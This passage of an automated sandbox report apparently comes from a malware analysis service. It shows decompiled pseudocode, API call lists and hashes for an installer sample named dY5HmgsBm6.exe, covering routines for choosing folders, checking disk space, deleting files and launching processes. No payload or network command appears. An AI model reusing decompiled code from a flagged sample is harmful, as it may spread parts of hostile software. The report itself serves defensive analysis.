                                                        					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
                                                        						_t12 = E00406575(_t16, _t20);
                                                        						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
                                                        							if(_t12 != _t14) {
                                                        								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                        							}
                                                        						} else {
                                                        							E00406055(_t17, _t12);
                                                        						}
                                                        					}
                                                        					_push(_t20);
                                                        					CloseHandle();
                                                        				}
                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t22 - 4));
                                                        				return 0;
                                                        			}










                                                        0x00401f81
                                                        0x00401f86
                                                        0x00401f8c
                                                        0x00401f91
                                                        0x00401f95
                                                        0x004027bf
                                                        0x00401f9b
                                                        0x00401f9e
                                                        0x00401fa1
                                                        0x00401fa9
                                                        0x00401fb6
                                                        0x00401fb8
                                                        0x00401fb8
                                                        0x00401fab
                                                        0x00401fad
                                                        0x00401fad
                                                        0x00401fa9
                                                        0x00401fbf
                                                        0x00401fc0
                                                        0x00401fc0
                                                        0x00402a5d
                                                        0x00402a69

                                                        APIs
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00427A9C,747DEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00427A9C,747DEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00427A9C,747DEA30), ref: 0040527A
                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                          • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                          • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                          • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32 ref: 004065A8
                                                          • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                        • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                        • Opcode Fuzzy Hash: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                        • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00403830() {
                                                        				void* _t1;
                                                        				signed int _t6;
                                                        
                                                        				_t1 =  *0x40a018; // 0xffffffff
                                                        				if(_t1 != 0xffffffff) {
                                                        					CloseHandle(_t1);
                                                        					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                        					_t6 =  *0x40a018;
                                                        				}
                                                        				E00403875();
                                                        				return E004058BF(_t6, 0x436800, 7);
                                                        			}





                                                        0x00403830
                                                        0x00403838
                                                        0x0040383b
                                                        0x00403841
                                                        0x00403841
                                                        0x00403841
                                                        0x00403848
                                                        0x00403859

                                                        APIs
                                                        • CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                        • Instruction ID: 504de9a345f4e041b5d785333e0db00fbf57b3530eebac313f647de5124f4253
                                                        • Opcode Fuzzy Hash: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                        • Instruction Fuzzy Hash: D3C01231540704B6D1247F759D4F9093A58AB45736B608775B0F5B00F1D73C8669456D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 78%
                                                        			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				long _v16;
                                                        				long _v20;
                                                        				long _v24;
                                                        				char _v28;
                                                        				intOrPtr _v32;
                                                        				long _v36;
                                                        				char _v40;
                                                        				unsigned int _v44;
                                                        				signed int _v48;
                                                        				CHAR* _v56;
                                                        				intOrPtr _v60;
                                                        				intOrPtr _v64;
                                                        				intOrPtr _v68;
                                                        				CHAR* _v72;
                                                        				void _v76;
                                                        				struct HWND__* _v80;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr _t82;
                                                        				long _t87;
                                                        				signed char* _t89;
                                                        				void* _t95;
                                                        				signed int _t96;
                                                        				int _t109;
                                                        				signed char _t114;
                                                        				signed int _t118;
                                                        				struct HWND__** _t122;
                                                        				intOrPtr* _t138;
                                                        				CHAR* _t146;
                                                        				intOrPtr _t147;
                                                        				unsigned int _t150;
                                                        				signed int _t152;
                                                        				unsigned int _t156;
                                                        				signed int _t158;
                                                        				signed int* _t159;
                                                        				signed char* _t160;
                                                        				struct HWND__* _t165;
                                                        				struct HWND__* _t166;
                                                        				int _t168;
                                                        				unsigned int _t197;
                                                        				void* _t205;
                                                        
                                                        				_t156 = __edx;
                                                        				_t82 =  *0x42a068; // 0x68b54c
                                                        				_v32 = _t82;
                                                        				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                        				if(_a8 == 0x40b) {
                                                        					E004057F7(0x3fb, _t146);
                                                        					E004063D2(_t146);
                                                        				}
                                                        				_t166 = _a4;
                                                        				if(_a8 != 0x110) {
                                                        					L8:
                                                        					if(_a8 != 0x111) {
                                                        						L20:
                                                        						if(_a8 == 0x40f) {
                                                        							L22:
                                                        							_v8 = _v8 & 0x00000000;
                                                        							_v12 = _v12 & 0x00000000;
                                                        							E004057F7(0x3fb, _t146);
                                                        							if(E00405B7D(_t185, _t146) == 0) {
                                                        								_v8 = 1;
                                                        							}
                                                        							E004060F7(0x429860, _t146);
                                                        							_t87 = E00406500(1);
                                                        							_v16 = _t87;
                                                        							if(_t87 == 0) {
                                                        								L30:
                                                        								E004060F7(0x429860, _t146);
                                                        								_t89 = E00405B28(0x429860);
                                                        								_t158 = 0;
                                                        								if(_t89 != 0) {
                                                        									 *_t89 =  *_t89 & 0x00000000;
                                                        								}
                                                        								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                        									goto L35;
                                                        								} else {
                                                        									_t168 = 0x400;
                                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                        									asm("cdq");
                                                        									_v48 = _t109;
                                                        									_v44 = _t156;
                                                        									_v12 = 1;
                                                        									goto L36;
                                                        								}
                                                        							} else {
                                                        								_t159 = 0;
                                                        								if(0 == 0x429860) {
                                                        									goto L30;
                                                        								} else {
                                                        									goto L26;
                                                        								}
                                                        								while(1) {
                                                        									L26:
                                                        									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
                                                        									if(_t114 != 0) {
                                                        										break;
                                                        									}
                                                        									if(_t159 != 0) {
                                                        										 *_t159 =  *_t159 & _t114;
                                                        									}
                                                        									_t160 = E00405AD6(0x429860);
                                                        									 *_t160 =  *_t160 & 0x00000000;
                                                        									_t159 = _t160 - 1;
                                                        									 *_t159 = 0x5c;
                                                        									if(_t159 != 0x429860) {
                                                        										continue;
                                                        									} else {
                                                        										goto L30;
                                                        									}
                                                        								}
                                                        								_t150 = _v44;
                                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                        								_v44 = _t150 >> 0xa;
                                                        								_v12 = 1;
                                                        								_t158 = 0;
                                                        								__eflags = 0;
                                                        								L35:
                                                        								_t168 = 0x400;
                                                        								L36:
                                                        								_t95 = E00404AA1(5);
                                                        								if(_v12 != _t158) {
                                                        									_t197 = _v44;
                                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                        										_v8 = 2;
                                                        									}
                                                        								}
                                                        								_t147 =  *0x42ebfc; // 0x68bf12
                                                        								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                        									E00404A89(0x3ff, 0xfffffffb, _t95);
                                                        									if(_v12 == _t158) {
                                                        										SetDlgItemTextA(_a4, _t168, 0x429850);
                                                        									} else {
                                                        										E004049C4(_t168, 0xfffffffc, _v48, _v44);
                                                        									}
                                                        								}
                                                        								_t96 = _v8;
                                                        								 *0x42f4e4 = _t96;
                                                        								if(_t96 == _t158) {
                                                        									_v8 = E0040140B(7);
                                                        								}
                                                        								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                        									_v8 = _t158;
                                                        								}
                                                        								E0040419D(0 | _v8 == _t158);
                                                        								if(_v8 == _t158) {
                                                        									_t205 =  *0x42a880 - _t158; // 0x0
                                                        									if(_t205 == 0) {
                                                        										E00404566();
                                                        									}
                                                        								}
                                                        								 *0x42a880 = _t158;
                                                        								goto L53;
                                                        							}
                                                        						}
                                                        						_t185 = _a8 - 0x405;
                                                        						if(_a8 != 0x405) {
                                                        							goto L53;
                                                        						}
                                                        						goto L22;
                                                        					}
                                                        					_t118 = _a12 & 0x0000ffff;
                                                        					if(_t118 != 0x3fb) {
                                                        						L12:
                                                        						if(_t118 == 0x3e9) {
                                                        							_t152 = 7;
                                                        							memset( &_v76, 0, _t152 << 2);
                                                        							_v80 = _t166;
                                                        							_v72 = 0x42a890;
                                                        							_v60 = E0040495E;
                                                        							_v56 = _t146;
                                                        							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
                                                        							_t122 =  &_v80;
                                                        							_v64 = 0x41;
                                                        							__imp__SHBrowseForFolderA(_t122);
                                                        							if(_t122 == 0) {
                                                        								_a8 = 0x40f;
                                                        							} else {
                                                        								__imp__CoTaskMemFree(_t122);
                                                        								E00405A8F(_t146);
                                                        								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
                                                        								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel") {
                                                        									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
                                                        									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
                                                        										lstrcatA(_t146, 0x42e3c0);
                                                        									}
                                                        								}
                                                        								 *0x42a880 =  *0x42a880 + 1;
                                                        								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                        							}
                                                        						}
                                                        						goto L20;
                                                        					}
                                                        					if(_a12 >> 0x10 != 0x300) {
                                                        						goto L53;
                                                        					} else {
                                                        						_a8 = 0x40f;
                                                        						goto L12;
                                                        					}
                                                        				} else {
                                                        					_t165 = GetDlgItem(_t166, 0x3fb);
                                                        					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
                                                        						E00405A8F(_t146);
                                                        					}
                                                        					 *0x42ebf8 = _t166;
                                                        					SetWindowTextA(_t165, _t146);
                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                        					_push(1);
                                                        					E0040417B(_t166);
                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                        					_push(0x14);
                                                        					E0040417B(_t166);
                                                        					E004041B0(_t165);
                                                        					_t138 = E00406500(8);
                                                        					if(_t138 == 0) {
                                                        						L53:
                                                        						return E004041E2(_a8, _a12, _a16);
                                                        					} else {
                                                        						 *_t138(_t165, 1);
                                                        						goto L8;
                                                        					}
                                                        				}
                                                        			}















































                                                        0x0040460d
                                                        0x00404613
                                                        0x00404619
                                                        0x00404626
                                                        0x00404634
                                                        0x00404637
                                                        0x0040463f
                                                        0x00404645
                                                        0x00404645
                                                        0x00404651
                                                        0x00404654
                                                        0x004046c2
                                                        0x004046c9
                                                        0x004047a0
                                                        0x004047a7
                                                        0x004047b6
                                                        0x004047b6
                                                        0x004047ba
                                                        0x004047c4
                                                        0x004047d1
                                                        0x004047d3
                                                        0x004047d3
                                                        0x004047e1
                                                        0x004047e8
                                                        0x004047ef
                                                        0x004047f2
                                                        0x00404829
                                                        0x0040482b
                                                        0x00404831
                                                        0x00404836
                                                        0x0040483a
                                                        0x0040483c
                                                        0x0040483c
                                                        0x00404858
                                                        0x00000000
                                                        0x0040485a
                                                        0x0040485d
                                                        0x0040486b
                                                        0x00404871
                                                        0x00404872
                                                        0x00404875
                                                        0x00404878
                                                        0x00000000
                                                        0x00404878
                                                        0x004047f4
                                                        0x004047f6
                                                        0x004047fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004047fc
                                                        0x004047fc
                                                        0x00404809
                                                        0x0040480e
                                                        0x00000000
                                                        0x00000000
                                                        0x00404812
                                                        0x00404814
                                                        0x00404814
                                                        0x0040481c
                                                        0x0040481e
                                                        0x00404821
                                                        0x00404824
                                                        0x00404827
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404827
                                                        0x00404884
                                                        0x0040488e
                                                        0x00404891
                                                        0x00404894
                                                        0x0040489b
                                                        0x0040489b
                                                        0x0040489d
                                                        0x0040489d
                                                        0x004048a2
                                                        0x004048a4
                                                        0x004048ac
                                                        0x004048b3
                                                        0x004048b5
                                                        0x004048c0
                                                        0x004048c0
                                                        0x004048b5
                                                        0x004048c7
                                                        0x004048d0
                                                        0x004048da
                                                        0x004048e2
                                                        0x004048fd
                                                        0x004048e4
                                                        0x004048ed
                                                        0x004048ed
                                                        0x004048e2
                                                        0x00404902
                                                        0x00404907
                                                        0x0040490c
                                                        0x00404915
                                                        0x00404915
                                                        0x0040491e
                                                        0x00404920
                                                        0x00404920
                                                        0x0040492c
                                                        0x00404934
                                                        0x00404936
                                                        0x0040493c
                                                        0x0040493e
                                                        0x0040493e
                                                        0x0040493c
                                                        0x00404943
                                                        0x00000000
                                                        0x00404943
                                                        0x004047f2
                                                        0x004047a9
                                                        0x004047b0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004047b0
                                                        0x004046cf
                                                        0x004046d8
                                                        0x004046f2
                                                        0x004046f7
                                                        0x00404701
                                                        0x00404708
                                                        0x00404714
                                                        0x00404717
                                                        0x0040471a
                                                        0x00404721
                                                        0x00404729
                                                        0x0040472c
                                                        0x00404730
                                                        0x00404737
                                                        0x0040473f
                                                        0x00404799
                                                        0x00404741
                                                        0x00404742
                                                        0x00404749
                                                        0x00404753
                                                        0x0040475b
                                                        0x00404768
                                                        0x0040477c
                                                        0x00404780
                                                        0x00404780
                                                        0x0040477c
                                                        0x00404785
                                                        0x00404792
                                                        0x00404792
                                                        0x0040473f
                                                        0x00000000
                                                        0x004046f7
                                                        0x004046e5
                                                        0x00000000
                                                        0x004046eb
                                                        0x004046eb
                                                        0x00000000
                                                        0x004046eb
                                                        0x00404656
                                                        0x00404663
                                                        0x0040466c
                                                        0x00404679
                                                        0x00404679
                                                        0x00404680
                                                        0x00404686
                                                        0x0040468f
                                                        0x00404692
                                                        0x00404695
                                                        0x0040469d
                                                        0x004046a0
                                                        0x004046a3
                                                        0x004046a9
                                                        0x004046b0
                                                        0x004046b7
                                                        0x00404949
                                                        0x0040495b
                                                        0x004046bd
                                                        0x004046c0
                                                        0x00000000
                                                        0x004046c0
                                                        0x004046b7

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 0040465C
                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                        • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                        • lstrcmpiA.KERNEL32(: Completed,Name Setup: Completed,00000000,?,?), ref: 00404774
                                                        • lstrcatA.KERNEL32(?,: Completed), ref: 00404780
                                                        • SetDlgItemTextA.USER32 ref: 00404792
                                                          • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\dY5HmgsBm6.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\dY5HmgsBm6.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                          • Part of subcall function 004063D2: CharPrevA.USER32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                        • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                          • Part of subcall function 004049C4: lstrlenA.KERNEL32(Name Setup: Completed,Name Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                          • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                          • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: : Completed$A$C:\Users\user\AppData\Roaming\CachemanControlPanel$Name Setup: Completed
                                                        • API String ID: 2624150263-1178911408
                                                        • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                        • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                        • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                        • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 98%
                                                        			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
                                                        				signed int _v8;
                                                        				void* _v12;
                                                        				signed int _v16;
                                                        				struct _WIN32_FIND_DATAA _v336;
                                                        				signed int _t40;
                                                        				char* _t53;
                                                        				signed int _t55;
                                                        				signed int _t58;
                                                        				signed int _t64;
                                                        				signed int _t66;
                                                        				void* _t68;
                                                        				signed char _t69;
                                                        				CHAR* _t71;
                                                        				void* _t72;
                                                        				CHAR* _t73;
                                                        				char* _t76;
                                                        
                                                        				_t69 = _a8;
                                                        				_t73 = _a4;
                                                        				_v8 = _t69 & 0x00000004;
                                                        				_t40 = E00405B7D(__eflags, _t73);
                                                        				_v16 = _t40;
                                                        				if((_t69 & 0x00000008) != 0) {
                                                        					_t66 = DeleteFileA(_t73);
                                                        					asm("sbb eax, eax");
                                                        					_t68 =  ~_t66 + 1;
                                                        					 *0x42f4c8 =  *0x42f4c8 + _t68;
                                                        					return _t68;
                                                        				}
                                                        				_a4 = _t69;
                                                        				_t8 =  &_a4;
                                                        				 *_t8 = _a4 & 0x00000001;
                                                        				__eflags =  *_t8;
                                                        				if( *_t8 == 0) {
                                                        					L5:
                                                        					E004060F7(0x42b898, _t73);
                                                        					__eflags = _a4;
                                                        					if(_a4 == 0) {
                                                        						E00405AD6(_t73);
                                                        					} else {
                                                        						lstrcatA(0x42b898, "\*.*");
                                                        					}
                                                        					__eflags =  *_t73;
                                                        					if( *_t73 != 0) {
                                                        						L10:
                                                        						lstrcatA(_t73, 0x40a014);
                                                        						L11:
                                                        						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                        						_t40 = FindFirstFileA(0x42b898,  &_v336);
                                                        						__eflags = _t40 - 0xffffffff;
                                                        						_v12 = _t40;
                                                        						if(_t40 == 0xffffffff) {
                                                        							L29:
                                                        							__eflags = _a4;
                                                        							if(_a4 != 0) {
                                                        								_t32 = _t71 - 1;
                                                        								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                        								__eflags =  *_t32;
                                                        							}
                                                        							goto L31;
                                                        						} else {
                                                        							goto L12;
                                                        						}
                                                        						do {
                                                        							L12:
                                                        							_t76 =  &(_v336.cFileName);
                                                        							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
                                                        							__eflags =  *_t53;
                                                        							if( *_t53 != 0) {
                                                        								__eflags = _v336.cAlternateFileName;
                                                        								if(_v336.cAlternateFileName != 0) {
                                                        									_t76 =  &(_v336.cAlternateFileName);
                                                        								}
                                                        							}
                                                        							__eflags =  *_t76 - 0x2e;
                                                        							if( *_t76 != 0x2e) {
                                                        								L19:
                                                        								E004060F7(_t71, _t76);
                                                        								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                        								if(__eflags == 0) {
                                                        									_t55 = E00405877(__eflags, _t73, _v8);
                                                        									__eflags = _t55;
                                                        									if(_t55 != 0) {
                                                        										E0040521E(0xfffffff2, _t73);
                                                        									} else {
                                                        										__eflags = _v8 - _t55;
                                                        										if(_v8 == _t55) {
                                                        											 *0x42f4c8 =  *0x42f4c8 + 1;
                                                        										} else {
                                                        											E0040521E(0xfffffff1, _t73);
                                                        											E00405ED6(_t72, _t73, 0);
                                                        										}
                                                        									}
                                                        								} else {
                                                        									__eflags = (_a8 & 0x00000003) - 3;
                                                        									if(__eflags == 0) {
                                                        										E004058BF(__eflags, _t73, _a8);
                                                        									}
                                                        								}
                                                        								goto L27;
                                                        							}
                                                        							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                        							__eflags = _t64;
                                                        							if(_t64 == 0) {
                                                        								goto L27;
                                                        							}
                                                        							__eflags = _t64 - 0x2e;
                                                        							if(_t64 != 0x2e) {
                                                        								goto L19;
                                                        							}
                                                        							__eflags =  *((char*)(_t76 + 2));
                                                        							if( *((char*)(_t76 + 2)) == 0) {
                                                        								goto L27;
                                                        							}
                                                        							goto L19;
                                                        							L27:
                                                        							_t58 = FindNextFileA(_v12,  &_v336);
                                                        							__eflags = _t58;
                                                        						} while (_t58 != 0);
                                                        						_t40 = FindClose(_v12);
                                                        						goto L29;
                                                        					}
                                                        					__eflags =  *0x42b898 - 0x5c;
                                                        					if( *0x42b898 != 0x5c) {
                                                        						goto L11;
                                                        					}
                                                        					goto L10;
                                                        				} else {
                                                        					__eflags = _t40;
                                                        					if(_t40 == 0) {
                                                        						L31:
                                                        						__eflags = _a4;
                                                        						if(_a4 == 0) {
                                                        							L39:
                                                        							return _t40;
                                                        						}
                                                        						__eflags = _v16;
                                                        						if(_v16 != 0) {
                                                        							_t40 = E0040646B(_t73);
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								goto L39;
                                                        							}
                                                        							E00405A8F(_t73);
                                                        							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
                                                        							__eflags = _t40;
                                                        							if(_t40 != 0) {
                                                        								return E0040521E(0xffffffe5, _t73);
                                                        							}
                                                        							__eflags = _v8;
                                                        							if(_v8 == 0) {
                                                        								goto L33;
                                                        							}
                                                        							E0040521E(0xfffffff1, _t73);
                                                        							return E00405ED6(_t72, _t73, 0);
                                                        						}
                                                        						L33:
                                                        						 *0x42f4c8 =  *0x42f4c8 + 1;
                                                        						return _t40;
                                                        					}
                                                        					__eflags = _t69 & 0x00000002;
                                                        					if((_t69 & 0x00000002) == 0) {
                                                        						goto L31;
                                                        					}
                                                        					goto L5;
                                                        				}
                                                        			}



















                                                        0x004058c9
                                                        0x004058ce
                                                        0x004058d7
                                                        0x004058da
                                                        0x004058e2
                                                        0x004058e5
                                                        0x004058e8
                                                        0x004058f0
                                                        0x004058f2
                                                        0x004058f3
                                                        0x00000000
                                                        0x004058f3
                                                        0x004058fe
                                                        0x00405901
                                                        0x00405901
                                                        0x00405901
                                                        0x00405905
                                                        0x00405918
                                                        0x0040591f
                                                        0x00405924
                                                        0x00405928
                                                        0x00405938
                                                        0x0040592a
                                                        0x00405930
                                                        0x00405930
                                                        0x0040593d
                                                        0x00405940
                                                        0x0040594b
                                                        0x00405951
                                                        0x00405956
                                                        0x00405966
                                                        0x00405968
                                                        0x0040596e
                                                        0x00405971
                                                        0x00405974
                                                        0x00405a2c
                                                        0x00405a2c
                                                        0x00405a30
                                                        0x00405a32
                                                        0x00405a32
                                                        0x00405a32
                                                        0x00405a32
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040597a
                                                        0x0040597a
                                                        0x00405983
                                                        0x00405989
                                                        0x0040598e
                                                        0x00405991
                                                        0x00405993
                                                        0x00405997
                                                        0x00405999
                                                        0x00405999
                                                        0x00405997
                                                        0x0040599c
                                                        0x0040599f
                                                        0x004059b2
                                                        0x004059b4
                                                        0x004059b9
                                                        0x004059c0
                                                        0x004059db
                                                        0x004059e0
                                                        0x004059e2
                                                        0x00405a06
                                                        0x004059e4
                                                        0x004059e4
                                                        0x004059e7
                                                        0x004059fb
                                                        0x004059e9
                                                        0x004059ec
                                                        0x004059f4
                                                        0x004059f4
                                                        0x004059e7
                                                        0x004059c2
                                                        0x004059c8
                                                        0x004059ca
                                                        0x004059d0
                                                        0x004059d0
                                                        0x004059ca
                                                        0x00000000
                                                        0x004059c0
                                                        0x004059a1
                                                        0x004059a4
                                                        0x004059a6
                                                        0x00000000
                                                        0x00000000
                                                        0x004059a8
                                                        0x004059aa
                                                        0x00000000
                                                        0x00000000
                                                        0x004059ac
                                                        0x004059b0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a0b
                                                        0x00405a15
                                                        0x00405a1b
                                                        0x00405a1b
                                                        0x00405a26
                                                        0x00000000
                                                        0x00405a26
                                                        0x00405942
                                                        0x00405949
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405907
                                                        0x00405907
                                                        0x00405909
                                                        0x00405a36
                                                        0x00405a38
                                                        0x00405a3b
                                                        0x00405a8c
                                                        0x00405a8c
                                                        0x00405a8c
                                                        0x00405a3d
                                                        0x00405a40
                                                        0x00405a4b
                                                        0x00405a50
                                                        0x00405a52
                                                        0x00000000
                                                        0x00000000
